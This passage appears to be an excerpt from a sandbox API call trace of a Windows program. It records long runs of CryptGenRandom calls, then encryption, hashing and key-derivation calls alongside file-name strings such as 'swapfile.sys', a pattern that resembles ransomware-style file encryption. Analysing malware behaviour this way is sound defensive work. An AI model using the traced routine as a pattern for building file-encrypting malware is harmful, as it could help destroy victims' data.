pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.237] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.238] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.239] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.240] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.240] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.240] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.240] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.240] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x607570*, pdwDataLen=0x2d7f9cc*=0xf4, dwBufLen=0xaa0 | out: pbData=0x607570*, pdwDataLen=0x2d7f9cc*=0x100) returned 1 [0143.240] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x607670*, pdwDataLen=0x2d7f9cc*=0x1c, dwBufLen=0x9a0 | out: pbData=0x607670*, pdwDataLen=0x2d7f9cc*=0x100) returned 1 [0143.240] wcslen (_String=" ") returned 0x2 [0143.240] wcslen (_String="\\") returned 0x1 [0143.240] wcslen (_String="swapfile.sys") returned 0xc [0143.240] wcslen (_String=" ") returned 0x2 [0143.240] wcslen (_String=" bytes...") returned 0xa [0143.241] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.241] CryptAcquireContextW (in: phProv=0x2883a60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2883a60*=0x8becf8) returned 1 [0143.241] CryptCreateHash (in: hProv=0x8becf8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x2883a64 | out: phHash=0x2883a64) returned 1 [0143.241] CryptHashData (hHash=0x8be2f8, pbData=0x2d7fa50, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.241] CryptDeriveKey (in: hProv=0x8becf8, Algid=0x6610, hBaseData=0x8be2f8, dwFlags=0x4, phKey=0x2883a68 | out: phKey=0x2883a68*=0x8be438) returned 1 [0143.241] CryptSetKeyParam (hKey=0x8be438, dwParam=0x1, pbData=0x2d7fb50, dwFlags=0x0) returned 1 [0143.241] CryptSetKeyParam (hKey=0x8be438, dwParam=0x4, pbData=0x2d7fa00*=0x1, dwFlags=0x0) returned 1 [0143.241] wcslen (_String="\\\\?\\") returned 0x4 [0143.241] wcslen 